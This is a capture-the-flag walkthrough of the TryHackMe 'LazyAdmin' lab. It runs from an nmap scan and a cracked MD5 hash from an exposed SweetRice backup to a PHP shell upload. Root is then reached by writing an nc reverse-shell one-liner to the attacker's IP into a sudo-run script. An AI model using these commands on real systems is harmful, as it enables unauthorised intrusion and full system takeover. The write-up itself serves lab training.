TryHackMe - LazyAdmin
Nmap
┌──(root💀kali)-[~]
└─# nmap -T4 -sC -sV -O -Pn -p- 10.10.1.0
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-28 15:50 EDT
Nmap scan report for 10.10.1.0
Host is up (0.24s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=6/28%OT=22%CT=1%CU=37647%PV=Y%DS=4%DC=I%G=Y%TM=62BB608
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%CI=Z%TS=A)SEQ(SP=1
OS:04%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M506ST11NW7%O2=M506ST11NW7%O
OS:3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST11NW7%O6=M506ST11)WIN(W1=68DF%W2=
OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M506NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1305.33 seconds Port 80
Directory busting
With gobuster we find a directory
content
It is worth launching gobuster inside content as well. We did find other things there too
And we have a login portal http://10.10.1.0/content/as/
We could search for the admin user and try to use this exploit here
We find this interesting exploit by googlin about sweetrice cms
We indeed find a sql file here http://10.10.1.0/content/inc/mysql_backup/
We can also find a list of files as directory listing is enabled http://10.10.1.0/content/inc/
With google research we find in the exploits a reference to the plugin directory http://10.10.1.0/content/_plugin/
The mysql file
The mysql backup file contains an MD5 hashed password.
With a look on crackstation we can get it in cleartext
We can try to login using the username and password found in this file. It works
If we go in the media page there is a file upload vulnerability. According to the code of this exploit if we change our file extension to php5 it will get uploaded.
It works, our file is uploaded and then we get our shell
If we ls to /home we have an
itguydirectoryWe can even freely go to this user directory we have enough permissions
Let's grab the user flag
Let's stabilize our shell
python3 -c 'import pty; pty.spawn("/bin/bash")'In the home folder we have a file called
mysql_login.txtwith a password in it. We can connect to mysql with the password providedmysql -u rice -p
Privilege Escalation
Here is what we get if we do
sudo -l
Here is the content of
backup.pl
Here is the content of /etc/copy.sh, it looks like a reverse shell
Let's replace it with the same thing but with my kali IP instead
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.22.56 5554 >/tmp/f" > /etc/copy.shOur change is successful
Let's set our listener to port 5554
rlwrap nc -lvnp 5554And now let's launch the perl script we are allowed to launch
sudo /usr/bin/perl /home/itguy/backup.plWe get a root shell with having to do a lateral movement!
Let's grab our root flag
Last updated